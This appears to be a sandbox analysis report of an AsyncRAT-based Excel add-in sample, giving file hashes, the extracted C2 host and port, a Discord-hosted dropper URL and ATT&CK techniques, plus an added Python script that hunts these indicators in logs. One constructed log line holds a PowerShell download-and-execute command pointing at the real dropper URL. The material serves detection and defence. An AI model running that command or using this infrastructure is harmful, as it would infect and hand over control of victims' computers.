General

  • Target

    UPS Access infos.xll

  • Size

    2.0MB

  • Sample

    220701-p6zblsdfcj

  • MD5

    df7e8add740fcae0d645eb8f66e085f4

  • SHA1

    f5fd645f5596028a550c1e3351f3e097b33ddc17

  • SHA256

    d0ce0e20b4b1b80dbf73a08ee5205ade6a9ab7bd2f34c3de524ab034217fc403

  • SHA512

    65b9b2e77b9d9d2c7fb2979e4107f00cc2502d4f2454075991640318bd9ef812475b78dc60b862464afc82564d2aa04f57f30a0e42eef600d3cf3f68d20e65a8

Malware Config

Extracted

  • Language

    ps1

  • Source

  • URLs (exe.dropper)

    https://cdn.discordapp.com/attachments/982077202424279072/992061153092063242/Librarieszip

Extracted

  • Language

    xlm4.0

  • Source

Extracted

  • Family

    asyncrat

  • Version

    5.0.5

  • Botnet

    Venom Clients

  • C2

    expresschiatto.freeddns.org:4449

  • Mutex

    Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

  • Attributes

    • delay

      1

    • install

      false

    • install_folder

      %AppData%

  • aes.plain
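The extracted configuration is only useful once it becomes something a blocklist or SIEM can match on. The script below, added here as an illustration and not part of the sandbox report or of AsyncRAT itself, flattens the C2, dropper URL and mutex values listed above into indicators and runs them over a few log lines. The indicator values are copied from this page; the log lines are constructed, and the Sysmon-style field names (EventID, DestinationHostname, DestinationPort, QueryName, ScriptBlockText) are an assumption about the telemetry format.

```python
"""
Added example (not part of the sandbox report, and not AsyncRAT's own code):
turn the configuration extracted above into hunting indicators and run them
over a few log lines. The indicator values are the ones the report
extracted; the log lines are constructed to resemble Sysmon and PowerShell
events and do not come from the sample's execution.
"""
import re
from urllib.parse import urlparse

# Values copied from the extracted configuration above.
CONFIG = {
    "family": "asyncrat",
    "version": "5.0.5",
    "botnet": "Venom Clients",
    "c2": ["expresschiatto.freeddns.org:4449"],
    "mutex": "Venom_RAT_HVNC_Mutex_Venom RAT_HVNC",
    "dropper_urls": [
        "https://cdn.discordapp.com/attachments/982077202424279072/"
        "992061153092063242/Librarieszip",
    ],
}


def indicators(cfg):
    """Flatten the config into (kind, value) pairs for a blocklist or SIEM lookup."""
    out = []
    for entry in cfg["c2"]:
        host, _, port = entry.rpartition(":")
        out.append(("c2_host", host))
        out.append(("c2_port", int(port)))
    for url in cfg["dropper_urls"]:
        out.append(("url", url))
        # The host alone (cdn.discordapp.com) is far too broad to block; it is
        # kept only so that a DNS-only log line can still be flagged as weak.
        out.append(("url_host", urlparse(url).hostname))
    out.append(("mutex", cfg["mutex"]))
    return out


def scan_line(line, iocs):
    """Return the set of indicator kinds a single log line triggers."""
    hits = set()
    fields = dict(re.findall(r"(\w+)=(\S+)", line))  # assumed key=value layout
    c2_ports = {str(v) for k, v in iocs if k == "c2_port"}
    for kind, value in iocs:
        if kind == "c2_host" and value in line:
            # Require the configured port when the line carries one; a host
            # match without a port field (e.g. a DNS query) is still reported.
            port = fields.get("DestinationPort")
            if port is None or port in c2_ports:
                hits.add("c2")
        elif kind == "url" and value in line:
            hits.add("dropper_url")
        elif kind == "url_host" and value in line:
            hits.add("dropper_host")
        elif kind == "mutex" and value in line:
            hits.add("mutex")
    if "dropper_url" in hits:
        hits.discard("dropper_host")  # full URL match supersedes the weak host hit
    return hits


def scan(lines, iocs):
    """Map line index -> triggered kinds, for lines that triggered anything."""
    results = {}
    for i, line in enumerate(lines):
        hits = scan_line(line, iocs)
        if hits:
            results[i] = hits
    return results


# Constructed log lines; illustrative only, not captured from the sample.
SAMPLE_LOGS = [
    "EventID=3 Image=C:\\Users\\u\\AppData\\Roaming\\svc.exe "
    "DestinationHostname=expresschiatto.freeddns.org DestinationPort=4449",
    "EventID=22 Image=C:\\Users\\u\\AppData\\Roaming\\svc.exe "
    "QueryName=expresschiatto.freeddns.org",
    "EventID=4104 ScriptBlockText=IEX((New-Object Net.WebClient).DownloadString("
    "'https://cdn.discordapp.com/attachments/982077202424279072/"
    "992061153092063242/Librarieszip'))",
    "EventID=3 Image=C:\\Program Files\\Firefox\\firefox.exe "
    "DestinationHostname=expresschiatto.freeddns.org DestinationPort=443",
    "Mutex created: Venom_RAT_HVNC_Mutex_Venom RAT_HVNC",
    "EventID=3 Image=C:\\Program Files\\Firefox\\firefox.exe "
    "DestinationHostname=www.example.org DestinationPort=443",
]

if __name__ == "__main__":
    iocs = indicators(CONFIG)
    for i, kinds in scan(SAMPLE_LOGS, iocs).items():
        print(f"line {i}: {sorted(kinds)}")
```

The host and port are checked together because the C2 is a dynamic-DNS name that may resolve to anything; a connection to it on a port other than 4449 is reported as nothing here, while a bare DNS query for it still counts because the RAT resolves the name before connecting.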

Targets

    • Target

      UPS Access infos.xll

    • Size

      2.0MB

    • MD5

      df7e8add740fcae0d645eb8f66e085f4

    • SHA1

      f5fd645f5596028a550c1e3351f3e097b33ddc17

    • SHA256

      d0ce0e20b4b1b80dbf73a08ee5205ade6a9ab7bd2f34c3de524ab034217fc403

    • SHA512

      65b9b2e77b9d9d2c7fb2979e4107f00cc2502d4f2454075991640318bd9ef812475b78dc60b862464afc82564d2aa04f57f30a0e42eef600d3cf3f68d20e65a8

    • AsyncRat

      AsyncRAT is designed to remotely monitor and control other computers.

    • Async RAT payload

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Loads dropped DLL

    • Suspicious use of SetThreadContext

MITRE ATT&CK Matrix (ATT&CK v6)

Tactic                Technique                     Count  ID
Execution             Scheduled Task                1      T1053
Persistence           Scheduled Task                1      T1053
Privilege Escalation  Scheduled Task                1      T1053
Defense Evasion       Modify Registry               1      T1112
Discovery             Query Registry                2      T1012
Discovery             System Information Discovery  2      T1082
Discovery             Remote System Discovery       1      T1018

Tasks